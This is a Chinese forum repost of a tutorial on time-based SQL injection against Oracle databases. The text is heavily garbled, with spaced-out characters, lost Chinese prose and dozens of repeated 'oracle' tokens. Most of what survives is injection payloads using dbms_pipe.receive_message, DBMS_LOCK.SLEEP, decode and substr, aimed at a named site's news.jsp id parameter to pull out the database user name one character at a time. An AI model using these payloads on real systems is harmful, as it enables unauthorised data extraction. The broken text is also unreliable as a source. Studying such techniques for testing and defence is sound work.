找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 2|回复: 0

[26626] 2020-04-16_SQL注入基础oracle延时注入

[复制链接]

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 4 天前 | 显示全部楼层 |阅读模式
2020-04-16_SQL注入基础oracle延时注入 S Q L   o r a c l e     m O o n   m o o n s e c   2 0 2 0 - 0 4 - 1 6 o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   o r a c l e   1 D B M S _ L O C K . S L E E P ( ) 使 O r a c l e ( s t a c k e d   q u e r y ) 使 D B M S _ L O C K O r a c l e   P L / S Q L 使 d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 ) D B M S _ P I P E . R E C E I V E _ M E S S A G E R D S 1 0 p u b l i c D B M S _ L O C K . S L E E P ( ) S Q L 2   使 3 h t t p : / / w w w . j s p o r c l e . c o m / n e w s . j s p ? i d = - 1   o r   1 =   d b m s _ p i p e . r e c e i v e _ m e s s a g e ( ' R D S ' ,   1 0 ) - - h t t p : / / w w w . j s p o r c l e . c o m / n e w s . j s p ? i d = 1   a n d   1 = d b m s _ p i p e . r e c e i v e _ m e s s a g e ( ' R D S ' ,   1 0 ) - - 1 0 4     d e c o d e
使 d e c o d e a n d   1 = ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 1 , 1 ) , S , 1 , 0 )   f r o m   d u a l )   - - d e c o d e a n d   1 = ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 1 , 1 ) , S , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S , 1 0 ) , 0 )   f r o m   d u a l )   h t t p : / / w w w . j s p o r c l e . c o m / n e w s . j s p ? i d = 1   a n d   1 = ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 1 , 1 ) , ' S ' , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( ' R D S ' , 5 ) , 0 )   f r o m   d u a l )   - - 5   6 ( s e l e c t   d e c o d e ( l e n g t h ( u s e r ) , 6 , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 )   , 0 )   f r o m   d u a l ) ; h t t p : / / w w w . j s p o r c l e . c o m / n e w s . j s p ? i d = 1   a n d   1 = ( s e l e c t   d e c o d e ( l e n g t h ( u s e r ) , 6 , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( ' R D S ' , 1 0 ) , 0 )   f r o m   d u a l ) - - ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 1 , 1 ) , S , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 ) , 0 )   f r o m   d u a l )   - - ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 2 , 1 ) , Y , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 ) , 0 )   f r o m   d u a l )   - - ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 3 , 1 ) , Y , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 ) , 0 )   f r o m   d u a l ) - - ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 4 , 1 ) , T , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 ) , 0 )   f r o m   d u a l ) - - ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 5 , 1 ) , E , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 ) , 0 )   f r o m   d u a l ) - - ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 6 , 1 ) , N , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( R D S ,   1 0 ) , 0 )   f r o m   d u a l ) - - h t t p : / / w w w . j s p o r c l e . c o m / n e w s . j s p ? i d = 1   a n d   1 = ( s e l e c t   d e c o d e ( s u b s t r ( u s e r , 1 , 1 ) , ' S ' , d b m s _ p i p e . r e c e i v e _ m e s s a g e ( ' R D S ' , 1 0 ) , 0 )   f r o m   d u a l )   - -
~ 6

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 07:24 , Processed in 0.290608 second(s), 29 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表